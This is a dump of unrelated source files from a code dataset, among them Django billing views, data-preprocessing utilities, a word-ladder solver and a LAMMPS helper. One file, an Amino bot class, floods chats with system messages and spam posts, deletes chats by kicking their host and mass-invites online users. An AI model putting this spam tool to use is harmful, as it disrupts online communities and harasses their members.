os.path.splitext(basefilename)\n # if basename.startswith(\"state_\"):\n # _, state = basename.split(\"_\")\n # elif basename.startswith(\"county_\"):\n # _, state, county = basename.split(\"_\")\n # else:\n # raise Exception(\n # f\"Filename {csvfile} cannot be parsed into location elements\")\n # return state, county\n\n\n# .............................................................................\n__all__ = [\n \"available_cpu_count\",\n \"count_lines\",\n \"delete_file\",\n \"get_csv_dict_reader\",\n \"get_csv_dict_writer\",\n \"get_csv_writer\",\n \"ready_filename\"\n]\n","sub_path":"bison/common/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":31240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"310919610","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.http import HttpResponseRedirect\nfrom django.views.generic import View\nfrom twilio.rest import Client\nfrom .models import Bill, Product\nfrom .forms import BillForm, ProductForm\n\n\ndef dashboard(request):\t\t#Shows the list of all the stored bills\n\tbills = Bill.objects.all().order_by('-created')[:10]\n\tcontext = {\n\t\t'bills': bills\n\t}\n\treturn render(request, 'bill/dashboard.html', context)\n\n\ndef detail(request, id):\t#A detail view of that Bill id\n\tbill = get_object_or_404(Bill, id=id)\n\tproducts = bill.product_set.all()\n\tcontext = {\n\t\t'bill': bill,\n\t\t'products': products\n\t}\n\treturn render(request, 'bill/summary.html', context)\n\n\ndef new_bill(request):\n\tbill = BillForm(request.POST or None)\n\tif bill.is_valid():\n\t\t\tbill = bill.save()\n\t\t\treturn redirect('bill:products', bill.id)\n\tcontext = {\n\t\t'bill': bill\n\t}\n\treturn render(request, 'bill/new_bill.html', context)\n\n\ndef products(request, id):\n\tbill = get_object_or_404(Bill, id=id)\n\tproducts = bill.product_set.all()\n\tadd_product = ProductForm(request.POST or None)\n\tif add_product.is_valid():\n\t\tadd_product = add_product.save(commit=False)\n\t\tadd_product.taxable_value = add_product.rate * add_product.quantity\n\t\tif add_product.discount > 0:\n\t\t\tadd_product.taxable_value = add_product.taxable_value - (add_product.taxable_value*(add_product.discount/100))\n\t\tadd_product.cgst_amount = add_product.taxable_value * (float(add_product.cgst_rate)/100)\n\t\tadd_product.sgst_amount = add_product.taxable_value * (float(add_product.sgst_rate)/100)\n\t\tadd_product.igst_amount = add_product.taxable_value * (float(add_product.igst_rate)/100)\n\t\tif add_product.igst_amount != 0:\n\t\t\tadd_product.amount = add_product.taxable_value + add_product.igst_amount\n\t\telse:\n\t\t\tadd_product.amount = add_product.taxable_value + add_product.cgst_amount + add_product.sgst_amount\n\t\tbill.total = bill.total + add_product.amount\n\t\tbill.invoice = \"RC{0}9{1}\".format(bill.date_of_issue.strftime(\"%y%m%d\"), bill.id)\n\t\tadd_product.bill = bill\n\t\tadd_product.save()\n\t\tbill.save()\n\t\treturn redirect('bill:products', id)\n\n\tcontext = {\n\t\t'bill': bill,\n\t\t'products': products,\n\t\t'add_product': add_product\t}\n\treturn render(request, 'bill/new_product.html', context)\n\n\ndef send_sms(request, id):\n\tprint(\"YO\")\n\tbill = get_object_or_404(Bill, id = id)\n\tto = \"+91{0}\".format(bill.buyer_mobile)\n\tmessage = \"Your invoice no. is {}. And the amount payable is ₹{}\".format(bill.invoice, bill.total)\n\taccount_sid = os.environ['TWILIO_ACCOUNT_SID']\n\tauth_token = os.environ['TWILIO_AUTH_TOKEN']\n\tclient = Client(account_sid, auth_token)\n\tprint(\"Object Created\")\n\t\n\ttry:\n\t\tclient.messages.create(\n\t\t to = to,\n\t\t from_ = os.environ['TWILIO_NUMBER'],\n\t\t body = message\n\t )\n\texcept Exception as e:\n\t\tprint(e)\n\n\tprint(\"Passed the send_sms\")\n\treturn redirect('bill:summary', id)\n\n\ndef history(request):\n\tbills = Bill.objects.all().order_by('-created')\n\treturn render(request, 'bill/history.html', { 'bills': bills })","sub_path":"invoicer/bill/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"256831688","text":"@ignore_warnings(category=RuntimeWarning)\ndef test_warm_start():\n X = X_iris\n y = y_iris\n y_2classes = np.array((([0] * 75) + ([1] * 75)))\n y_3classes = np.array(((([0] * 40) + ([1] * 40)) + ([2] * 70)))\n y_3classes_alt = np.array(((([0] * 50) + ([1] * 50)) + ([3] * 50)))\n y_4classes = np.array((((([0] * 37) + ([1] * 37)) + ([2] * 38)) + ([3] * 38)))\n y_5classes = np.array(((((([0] * 30) + ([1] * 30)) + ([2] * 30)) + ([3] * 30)) + ([4] * 30)))\n clf = MLPClassifier(hidden_layer_sizes=2, solver='lbfgs', warm_start=True).fit(X, y)\n clf.fit(X, y)\n clf.fit(X, y_3classes)\n for y_i in (y_2classes, y_3classes_alt, y_4classes, y_5classes):\n clf = MLPClassifier(hidden_layer_sizes=2, solver='lbfgs', warm_start=True).fit(X, y)\n message = ('warm_start can only be used where `y` has the same classes as in the previous call to fit. Previously got [0 1 2], `y` has %s' % np.unique(y_i))\n assert_raise_message(ValueError, message, clf.fit, X, y_i)","sub_path":"Data Set/bug-fixing-5/8e310cd82698fa88108ad51f708dc7cad56a3039--bug.py","file_name":"8e310cd82698fa88108ad51f708dc7cad56a3039--bug.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"434271403","text":"import sys\nimport io\nsys.stdout = io.TextIOWrapper(sys.stdout.detach(), encoding = 'utf-8')\nsys.stderr = io.TextIOWrapper(sys.stderr.detach(), encoding = 'utf-8')\nimport os\nimport urllib.request as req\nfrom bs4 import BeautifulSoup as be\nimport urllib.parse as rep\n\n\nbase = \"https://www.inflearn.com/\"\nquote = rep.quote_plus(\"추천-강좌\")\nurl = base + quote\n\nres = req.urlopen(url).read()\nsavePath = \"D:/python/Crawling/section2/downimg/\"\n\n# 이미지 폴더 확인 및 생성 하기\ntry:\n if not (os.path.isdir(savePath)):\n os.makedirs(os.path.join(savePath))\n\nexcept OSError:\n if e.errno != errno.EExist:\n print(\"폴더 만들기 실패!!\")\n raise\n\n\nsoup = be(res,\"html.parser\")\n\nimg_list = soup.select(\"ul.slides\")[1]\n\nprint(img_list)\n\nfor i,e in enumerate(img_list,1):\n with open(savePath+\"text_\"+str(i)+\".txt\",\"wt\") as f:\n f.write(e.select_one(\"h4.block_title > a\").string)\n\n fullFileName = os.path.join(savePath,savePath+str(i)+'.png')\n req.urlretrieve(e.select_one(\"div.block_media > a > img\")['src'],fullFileName)\n\nprint(\"download OK!!\")\n","sub_path":"download5-2.py","file_name":"download5-2.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"650339454","text":"# -*- coding: utf-8 -*-\r\n# CI *4HC595\r\n# clock = 11\r\n# latch = 12\r\n# data = 14\r\n\r\n\r\nclass ControllerCI(object):\r\n def __init__(self, clock, latch, data, gpio, qtdCI=1):\r\n self._qtdCI = qtdCI\r\n self._clock = clock\r\n self._latch = latch\r\n self._data = data\r\n self._gpio = gpio\r\n self._iniciarPortas()\r\n self._criarMapaBinario()\r\n\r\n def _iniciarPortas(self):\r\n self._gpio.setup(self._clock, self._gpio.OUT)\r\n self._gpio.setup(self._latch, self._gpio.OUT)\r\n self._gpio.setup(self._data, self._gpio.OUT)\r\n\r\n def _criarMapaBinario(self):\r\n self._ci = [[0, 0, 0, 0, 0, 0, 0, 0] for x in range(self._qtdCI)]\r\n\r\n def _escreverMapaBinario(self, pino, estado):\r\n if (pino <= self._qtdCI * 8) and (pino != 0):\r\n self._ci[int((pino - 1) / 8)][(pino - 1) % 8] = estado\r\n else:\r\n print(f'Pino {pino} inválido')\r\n\r\n def _atualizarEstado(self):\r\n self._gpio.output(self._latch, 0)\r\n\r\n for ci in range(self._qtdCI - 1, -1, -1):\r\n for pin in range(7, -1, -1):\r\n self._gpio.output(self._clock, 0)\r\n self._gpio.output(self._data, self._ci[ci][pin])\r\n self._gpio.output(self._clock, 1)\r\n self._gpio.output(self._data, 0)\r\n\r\n self._gpio.output(self._latch, 1)\r\n\r\n def write(self, pin, value, ci=0):\r\n if ci == 0:\r\n self._escreverMapaBinario(pin, value)\r\n self._atualizarEstado()\r\n elif (ci != 0 and ci <= self._qtdCI) and pin <= 8:\r\n pin = pin + ((ci - 1) * 8) \r\n self._escreverMapaBinario(pin, value)\r\n self._atualizarEstado()\r\n else:\r\n print('CI or invalid Pin')\r\n \r\n def clearAll(self):\r\n for pino in range(self._qtdCI * 8):\r\n self._escreverMapaBinario(pino + 1, 0)\r\n self._atualizarEstado()\r\n\r\n def setAll(self):\r\n for pino in range(self._qtdCI * 8):\r\n self._escreverMapaBinario(pino + 1, 1)\r\n self._atualizarEstado()\r\n","sub_path":"controller_ci.py","file_name":"controller_ci.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"535254025","text":"# Write a Python file that uploads an image to your \n# Twitter account. Make sure to use the \n# hashtags #UMSI-206 #Proj3 in the tweet.\n\n# You will demo this live for grading.\nOAUTH_TOKEN = 'XXX'\nOAUTH_TOKEN_SECRET = 'XXX'\nAPP_KEY = 'XXX'\nAPP_SECRET = 'XXX'\n\n\nfrom twython import Twython\ntwitter = Twython(APP_KEY, APP_SECRET,\n OAUTH_TOKEN, OAUTH_TOKEN_SECRET)\n\nphoto = open('/Users/AditiRajadhyaksha/Desktop/project3/HW3-StudentCopy/media/tweet_image.jpg', 'rb')\nresponse = twitter.upload_media(media=photo)\ntwitter.update_status(status='Submission for SI 206 Project 3 #UMSI-206 #Proj3', media_ids=[response['media_id']])","sub_path":"HW3-StudentCopy/twitterhw3a.py","file_name":"twitterhw3a.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"92106522","text":"# Example 1:\n\n# Input:\n# beginWord = \"hit\",\n# endWord = \"cog\",\n# wordList = [\"hot\",\"dot\",\"dog\",\"lot\",\"log\",\"cog\"]\n\n# Output: 5\n\n# Explanation: As one shortest transformation is \"hit\" -> \"hot\" -> \"dot\" -> \"dog\" -> \"cog\",\n# return its length 5.\n\n\n# Example 2:\n\n# Input:\n# beginWord = \"hit\"\n# endWord = \"cog\"\n# wordList = [\"hot\",\"dot\",\"dog\",\"lot\",\"log\"]\n\n# Output: 0\n\n# Explanation: The endWord \"cog\" is not in wordList, therefore no possible transformation.\n\nfrom string import ascii_lowercase\nimport copy\n\nclass Node:\n\tdef __init__(self, word, path):\n\t\tself.word = word\n\t\tself.path = path\n\ndef ladder(begin, end, word_list):\n\tqueue = []\n\n\twords = set(word_list)\n\n\tqueue.append(Node(begin, [begin]))\n\n\twhile len(queue) > 0:\n\t\tcur = queue.pop(0)\n\n\t\tcur_word = cur.word\n\t\tpath = cur.path\n\n\t\tif cur_word == end:\n\t\t\treturn path\n\n\t\tfor i in range(len(cur_word)):\n\t\t\tfor c in ascii_lowercase:\n\t\t\t\tpotential_word = cur_word[:i] + c + cur_word[i+1:]\n\n\t\t\t\tif potential_word in words:\n\t\t\t\t\tcopy_path = copy.deepcopy(path)\n\t\t\t\t\tcopy_path.append(potential_word)\n\t\t\t\t\tqueue.append(Node(potential_word, copy_path))\n\t\t\t\t\twords.remove(potential_word)\n\n\treturn []\n\nprint(ladder(\"hit\", \"cog\", [\"hot\",\"dot\",\"dog\",\"lot\",\"log\",\"cog\"]))\nprint(ladder(\"hit\", \"cog\", [\"hot\",\"dot\",\"dog\",\"lot\",\"log\"]))\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"Cracking Coding Interviews - Mastering Algorithms/src/Section 5 Graphs/word-ladder.py","file_name":"word-ladder.py","file_ext":"py","file_size_in_byte":1287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"403339941","text":"import numpy as np\nimport pandas as pd\nfrom scipy.optimize import minimize\nimport scipy.stats as st\nimport statsmodels.api as sm\nimport tools.Sample_Tools as smpl\n\n\nfrom sklearn import linear_model\n\ndef neutralize(factor:pd.Series, data, categorical:list=None, logarithmetics:list=None):\n '''中性化:\n :param categorical:{list} --指明需要被dummy的列\n :param logarithmetics:{list} --指明要对对数化的列\n 注:被categorical的column的value必须是字符串。\n 注:一般来说,顺序是 去极值->中性化->标准化\n 注:单截面操作\n '''\n if factor.index.is_monotonic_increasing == False or data.index.is_monotonic_increasing == False:\n import warnings\n warnings.warn('factor or data should be sorted, 否则有可能会造成会自变量和因变量匹配错误',UserWarning)\n \n X = data.copy()\n # 对数化\n if not logarithmetics is None:\n X[logarithmetics] = X[logarithmetics].agg('log')\n # 哑变量\n if not categorical is None:\n X = pd.get_dummies(X,categorical)\n \n# print(X)\n \n model = linear_model.LinearRegression().fit(X, factor)\n neutralize_factor = factor - model.predict(X)\n\n return neutralize_factor\n\n \n\n# def winsorize_by_quantile_multidates(obj, floor=0.025, upper=0.975, column=None, drop=True):\n# 去除全局极端值,分日期处理没意义\n# return excute_for_multidates(obj, winsorize_by_quantile, floor=floor,upper=upper, column=column, drop=drop).sort_index()\n\ndef winsorize_by_quantile(obj, floor=0.025, upper=0.975, column=None, drop=True):\n \"\"\"\n 根据分位上下限选取数据\n :param obj:{pd.DataFrame | pd.Series} \n :param column:{str} --当obj为DataFrame时,用来指明处理的列。\n :param drop:{bool} --分位外的数据处理方式,\n True:删除整(行)条数据;\n False:用临界值替换范围外的值\n \"\"\"\n if isinstance(obj, pd.Series):\n qt = obj.quantile([floor,upper])\n if drop:\n return obj[(obj>=qt[floor]) & (obj<=qt[upper])]\n else:\n obj[obj < qt[floor]] = qt[floor]\n obj[obj > qt[upper]] = qt[upper]\n return obj\n \n if isinstance(obj, pd.DataFrame):\n assert column, 'COLUMN CANT be NONE when obj is dataframe'\n qt = obj[column].quantile([floor,upper])\n if drop:\n return obj[(obj[column]>=qt[floor]) & (obj[column]<=qt[upper])]\n else:\n obj.loc[obj[column] < qt[floor], column] = qt[floor]\n obj.loc[obj[column] > qt[upper], column] = qt[upper]\n return obj\n \n raise TypeError('obj must be series or dataframe')\n\n# 标准化\ndef standardize(data, multi_code=False):\n if multi_code:\n return data.groupby(level=1, group_keys=False).apply(lambda x: standardize(x,multi_code=False))\n else:\n return (data - data.mean())/data.std()\n\ndef binning(df, deal_column:str,box_count:int, labels=None, inplace=True):\n \"\"\"\n 分箱,为df增加名为\"group_label\"的列作为分组标签。\n :param df:{pd.DataFrame} \n :param deal_column:{str} --要处理的列名,\n :param box_count:{int} --分几组,\n :param labels:{list} --分组的标签名,默认是分组序号(default:None)\n 默认情况下,生成的标签是反序的,既最小的值在最后的组\n :param inplace:{bool} --是否在原对象上修改,建议用true,效率高(default:True)\n :return: {pd.DataFame}\n \"\"\"\n assert isinstance(df, pd.DataFrame), 'df必须为dataframe'\n if not labels is None:\n assert len(labels)==box_count, 'labels的数量必须与分箱数相等'\n labels_= labels\n else:\n labels_= np.array(range(box_count))+1\n labels_ = labels_[::-1]\n \n reality_count = len(set(df[deal_column].values))\n \n if inplace:\n if box_count > reality_count:\n # 可能由于大量0或者nan,导致分类的数量少于分箱数量。 直接当任务失败,返回空值\n df['group_label'] = None\n return df\n else:\n df['group_label'] = pd.qcut(df[deal_column], box_count, labels=labels_,retbins=False)\n return df\n else:\n if box_count > reality_count:\n # 可能由于大量0或者nan,导致分类的数量少于分箱数量。 直接当任务失败,返回空值\n return df.assign(group_label=None)\n else:\n return df.assign(group_label=pd.qcut(df[deal_column], box_count, labels=labels_,retbins=False))\n\n","sub_path":"tools/Pretreat_Tools.py","file_name":"Pretreat_Tools.py","file_ext":"py","file_size_in_byte":4707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"469952431","text":"import os\nimport time\nimport itertools\nimport shutil\nimport re\nimport importlib.util\n\nconfig_spec = importlib.util.spec_from_file_location(\"config\", \"..\\\\config.py\")\nconfig = importlib.util.module_from_spec(config_spec)\nconfig_spec.loader.exec_module(config)\nfrom pprint import pprint\n\nignore_dirs = [\".git\", \"bin\", \"obj\", \".vs\"]\nignore_files = [\"dll\", \"exe\", \"pdb\", \"map\"]\n\n\ndef format_filemtime(path):\n filemtime = os.path.getmtime(path)\n return time.strftime('%Y-%m-%d', time.gmtime(filemtime))\n\n\ndef ignore_dir(dirpath):\n for dir in ignore_dirs:\n pattern = r\"\\\\\" + re.escape(dir) + r\"(\\\\|$)\"\n if re.search(pattern, dirpath):\n return True\n return False\n\n\ndef ignore_file(file_name):\n for ext in ignore_files:\n pattern = r\"\\.\" + ext + \"$\"\n if re.search(pattern, file_name):\n return True\n return False\n\n\ndef sanitize(path):\n start = time.perf_counter()\n\n for (dirpath, dirnames, filenames) in os.walk(path):\n if ignore_dir(dirpath):\n continue\n searchable_filenames = [filename for filename in filenames if not ignore_file(filename)]\n for filename in searchable_filenames:\n full_name = os.path.join(dirpath, filename)\n\n # without 'ignore' it throws for some files the UnicodeDecodeError 'utf-8' codec can't decode byte XXX in position XXX: invalid start byte\n with open(full_name, 'r', encoding=\"utf8\", errors=\"ignore\") as searchable:\n text = searchable.read()\n if config.re_forbidden.search(text):\n pprint(full_name)\n\n end = time.perf_counter()\n elapsed = round(end - start, 2)\n print(f\"elapsed: {elapsed} sec\")","sub_path":"src/sanitizer1.py","file_name":"sanitizer1.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"514911827","text":"import os\np=\"/Users/joker/Downloads/data/\"\ntarget=\"midi.lab.corrected.lab\"\nos.chdir(p)\nfor dname in os.listdir(p):\n if os.path.isdir(dname):\n oldname=os.path.basename(dname)\n newname=dname[0:4]\n os.rename(p+oldname, p+newname)\nprint(\"success\")\n","sub_path":"structural_analysis/data_prep/individual_modules/prepare_file.py","file_name":"prepare_file.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"351007144","text":"#!/usr/bin/python3\n\nimport math\n\ndef bin_list_to_int(bit_array: list):\n return int(''.join(str(x) for x in bit_array), 2)\n\n\n# From collection find biggest value that is less or equal to the given element.\n# On failure returns -1\ndef find_max_less(collection: list, element: int):\n biggest = -1\n\n for value in collection:\n if value <= element and value > biggest:\n biggest = value\n\n return biggest\n\n\ndef find_s(public_key: list, w0: int, p: int):\n s = 1\n\n while True:\n if math.gcd(s, w0) == 1 and (public_key[0] * s) % p == w0:\n print(s)\n s += 1\n\n\ndef decrypt(cypher: list, public_key: list, w: list, p: int, s: int):\n cypher = [(cypher[i] * s) % p for i in range(len(cypher))]\n\n decrypted = ''\n\n for c in cypher:\n dec_bin = [0 for _ in range(8)]\n\n while c != 0:\n largest = find_max_less(w, c)\n dec_bin[w.index(largest)] = 1\n c -= largest\n\n decrypted += chr(bin_list_to_int(dec_bin))\n\n return decrypted\n\n\ndef main():\n cypher = [242380, 697344, 363065, 515430, 734202, 717157, 98590, 643066, 498385, 98590, 515430, 771435, 643066, 498385, 515430, 363065, 717157, 98590, 515430, 643066, 697344, 515430, 363065, 717157]\n public_key = [197329, 45703, 98590, 98087, 280001, 273050, 256005, 218772]\n\n p = 289646 # mod\n s = 155467 # find with find_s(might not be 1st result)\n\n w = [(public_key[i] * s) % p for i in range(len(public_key))]\n\n\n '''\n # For finding s:\n w0 = 1907\n find_s(public_key, w0, p)\n '''\n \n\n print(f'Key = {w}')\n print(f'Text = {decrypt(cypher, public_key, w, p, s)}')\n\n \n\nif __name__ == \"__main__\":\n main()\n","sub_path":"10 Pratybos/knapsack_cryptosystem.py","file_name":"knapsack_cryptosystem.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"616562348","text":"from multiprocessing.pool import ThreadPool\n\nfrom termcolor import colored\n\nimport amino\n\n\nclass Badass:\n def __init__(self, sub_client: amino.SubClient):\n self.sub_client = sub_client\n\n def send_system_message(self, chatid: str):\n self.sub_client.join_chat(chatid)\n while True:\n message_type = int(input(\"Message type: \"))\n message = input(\"Message: \")\n try:\n self.sub_client.send_message(chatId=chatid, messageType=message_type, message=message)\n print(\"Message sent\")\n except amino.exceptions.ChatViewOnly:\n print(colored(\"Chat is in only view mode\", \"red\"))\n except:\n pass\n choice = input(\"Repeat?(y/n): \")\n if choice.lower() == \"n\":\n break\n\n def spam_system_message(self, chatid: str):\n pool_count = int(input(\"Number of threads: \"))\n pool = ThreadPool(pool_count)\n count_messages = int(input(\"Count of messages: \"))\n message_type = int(input(\"Message type: \"))\n message = input(\"Message: \")\n self.sub_client.join_chat(chatid)\n while True:\n for _ in range(count_messages):\n print(\"Message sent\")\n pool.apply_async(self.sub_client.send_message, [chatid, message, message_type])\n choice = input(\"Repeat?(y/n): \")\n if choice.lower() == \"n\":\n break\n\n def delete_chat(self, chatid: str):\n chat = self.sub_client.get_chat_thread(chatId=chatid)\n admins = [*chat.coHosts, chat.author.userId]\n if self.sub_client.profile.userId in admins:\n self.sub_client.kick(chatId=chatid, allowRejoin=False, userId=chat.author.userId)\n print(\"Chat deleted\")\n else:\n print(colored(\"You don't have co-host/host rights to use this function\", \"red\"))\n\n def invite_all_users(self, chatid: str):\n pool = ThreadPool(100)\n count = 0\n for i in range(0, 10000, 100):\n users = self.sub_client.get_online_users(start=i, size=100).profile.userId\n if not users:\n break\n for userid in users:\n pool.apply_async(self.sub_client.invite_to_chat, [userid, chatid])\n count += 1\n print(f\"{count} users invited to chat\", end=\"\\r\")\n print(\"All online users invited to chat\")\n\n def spam_posts(self):\n pool_count = int(input(\"Number of threads: \"))\n pool = ThreadPool(pool_count)\n posts_count = int(input(\"Count of posts: \"))\n title = input(\"Post title: \")\n content = input(\"Post content: \")\n while True:\n for i in range(posts_count):\n print(\"Post sent\")\n pool.apply_async(self.sub_client.post_blog, [title, content])\n choice = input(\"Repeat?(y/n): \")\n if choice.lower() == \"n\":\n break\n","sub_path":"src/scripts/badass.py","file_name":"badass.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"547484398","text":"class Route():\n def __init__(self, city1, city2, length, locomotives, color, is_tunnel, is_claimed):\n self.city1 = city1\n self.city2 = city2\n self.length = length\n self.locomotives = locomotives\n self.color = color\n self.is_tunnel = is_tunnel\n self.is_claimed = is_claimed\n\n def to_str(self):\n # res = f'city1: {self.city1}, city2: {self.city2}, color: {self.color}, length: {self.length}, locomotives: {self.locomotives}, tunnel: {self.is_tunnel}, claimed?: {self.is_claimed}'\n if self.is_tunnel:\n return f'{self.city1} -> {self.city2} -- tunel'\n else:\n return f'{self.city1} -> {self.city2}'\n\n def claim(self, player):\n self.is_claimed = player.name\n\n\nclass City():\n def __init__(self, name):\n self.Routes = []\n self.name = name\n self.station = None\n\n # Dodaje trasę do listy tras wychodzących z tego miasta\n def add_Route(self, Route):\n self.Routes.append(Route)\n\n # Sprawdza czy w mieście już znajduje się stacja\n def is_occupied(self):\n return self.station != None\n\n def to_str(self):\n res = f'name: {self.name}, list of routes:\\n'\n return res\n\n\n\nclass Board():\n def __init__(self, Cities, Routes):\n self.Cities = Cities\n self.Routes = Routes\n self.faceupCards = []\n\n # Zwraca string z wolymi miastami\n def to_str_freeCities(self):\n res = ''\n for city in self.Cities:\n if not city.is_occupied():\n res += f'{city.name}, '\n return res\n\n # Zwraca string z wolnymi drogami\n def to_str_freeRoutes(self):\n res = ''\n for route in self.Routes:\n if not route.is_claimed:\n res += f'{route.to_str()}, \\n'\n return res\n\n # Dokłada karty na stół\n def add_faceup_cards(self, cards):\n for card in cards:\n self.faceupCards.append(card)\n\n # Wypisuje karty na stole\n def to_str_faceup(self):\n res = ''\n i = 1\n for card in self.faceupCards:\n res += f'{i}. '\n res += card.to_str()\n res += '\\n'\n i += 1\n return res\n\n # Zwraca wybrane karty z planszy i podmienia na nowe\n def pick_faceup(self, numbers, cards):\n res = []\n temp = []\n print(numbers)\n for number in numbers:\n res.append(self.faceupCards[number])\n for number in numbers:\n temp.append(self.faceupCards[number])\n for el in temp:\n self.faceupCards.remove(el)\n self.add_faceup_cards(cards)\n return res\n","sub_path":"Board.py","file_name":"Board.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"137367635","text":"import setuptools # this is the \"magic\" import\nfrom numpy.distutils.core import setup\nfrom glob import glob\nfrom numpy.distutils import exec_command\nfrom shutil import move\nfrom sys import argv\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\n\n#make clean every time slows things but is needed because users will mostly install after changing networks\n#and a make never seems to full update the new network\nstatus, output = exec_command.exec_command(\n \"make clean\", execute_in=\"src/fortran_src/\", use_shell=True\n)\n\nstatus, output = exec_command.exec_command(\n \"make python\", execute_in=\"src/fortran_src/\", use_shell=True\n)\n\nwrap_file = glob(\"src/fortran_src/uclchemwrap*.so\")[0]\nmove(wrap_file, \"src/uclchem/uclchemwrap.so\")\n\n\nexec(open(\"src/uclchem/__version__.py\").read())\nsetup(\n name=\"uclchem\", # Replace with your own username\n version=__version__,\n author=\"Jonathan Holdship\",\n author_email=\"jonholdship@gmail.com\",\n description=\"A package for chemical modelling\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://uclchem.github.io\",\n packages=setuptools.find_packages(where=\"src\"),\n package_dir={\"uclchem\": \"src/uclchem\"},\n package_data={\"uclchem\": [\"uclchemwrap.so\"]},\n data_files=[(\"uclchem\", glob(\"src/*.csv\"))],\n classifiers=[\n \"Development Status :: 5 - Production/Stable\",\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires=\">=3.6\",\n install_requires=[\"pandas\", \"numpy\", \"pyyaml\", \"matplotlib\", \"seaborn\"],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1668,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"386244250","text":"#Import dependencies\nimport os\nimport csv\n\n#Provide File Path\nelection = os.path.join('..', 'Resources', 'election_data.csv')\n\ntotalVotes = 0\ncandidateList = {}\nwinner = ''\nmostVotes = 0\n\n#Read in the csv file\nwith open(election, 'r') as csvfile:\n #split the data on commas\n csvreader = csv.reader(csvfile)\n #skip the header row\n header = next(csvreader)\n\n for row in csvreader:\n voterID = row[0]\n candidate = row[2]\n\n #Total number of votes cast\n totalVotes += 1\n #Populate candidateList with candidates\n if candidate not in candidateList:\n #The first time a new candidate is encountered, add it to the list with a vote count of 1\n candidateList[candidate] = 1\n else:\n #Each additional time the candidate is encountered, increment their vote count\n candidateList[candidate] += 1\n\n #Iterate over the candidates to determine the winner\n for candidate in candidateList:\n if candidateList[candidate] > mostVotes:\n mostVotes = candidateList[candidate]\n winner = candidate\n\noutputText = f\"\"\"Election Results \n----------------------------\nTotal Votes: {totalVotes} \n----------------------------\"\"\"\nfor candidate in candidateList:\n outputText += f\"\\n{candidate}: {round(candidateList[candidate] / totalVotes * 100, 3)}% ({candidateList[candidate]})\"\noutputText += f\"\"\"\\n----------------------------\nWinner: {winner}\n----------------------------\"\"\"\n\n#Print the analysis to the terminal... \nprint(outputText) \n \n#...and export to a text file with the results\noutputFile = os.path.join('..', 'analysis', 'PyPollOutput.txt')\nwith open(outputFile, 'w') as datafile:\n datafile.write(outputText)","sub_path":"PyPoll/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"176497078","text":"import os\n\nfrom pylammpsmpi import LammpsASELibrary\n\nfrom pyiron_lammps.potential import view_potentials\n\n\ndef update_potential_paths(df_pot, resource_path):\n config_lst = []\n for row in df_pot.itertuples():\n potential_file_lst = row.Filename\n potential_file_path_lst = [\n os.path.join(resource_path, f) for f in potential_file_lst\n ]\n potential_dict = {os.path.basename(f): f for f in potential_file_path_lst}\n potential_commands = []\n for l in row.Config:\n l = l.replace(\"\\n\", \"\")\n for key, value in potential_dict.items():\n l = l.replace(key, value)\n potential_commands.append(l)\n config_lst.append(potential_commands)\n df_pot[\"Config\"] = config_lst\n return df_pot\n\n\ndef get_lammps_engine(\n working_directory=None,\n cores=1,\n comm=None,\n logger=None,\n log_file=None,\n library=None,\n diable_log_file=True,\n):\n return LammpsASELibrary(\n working_directory=working_directory,\n cores=cores,\n comm=comm,\n logger=logger,\n log_file=log_file,\n library=library,\n diable_log_file=diable_log_file,\n )\n\n\ndef get_potential_dataframe(structure, resource_path):\n return update_potential_paths(\n df_pot=view_potentials(structure=structure, resource_path=resource_path),\n resource_path=resource_path,\n )\n","sub_path":"pyiron_lammps/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"466639652","text":"from fastapi import APIRouter, Depends\nfrom sqlalchemy.orm import Session\nfrom app import crud, models, schemas\nfrom app.database import SessionLocal, engine\nfrom typing import List\n\nrouter = APIRouter()\n\nmodels.Base.metadata.create_all(bind=engine)\n\n# Dependency\ndef get_db():\n db = SessionLocal()\n try:\n yield db\n finally:\n db.close()\n\n\n@router.get(\n \"/points/season/{season}\",\n response_model=List[schemas.PointEvent],\n summary=\"point logs for a season\",\n)\ndef read_season(season: str, db: Session = 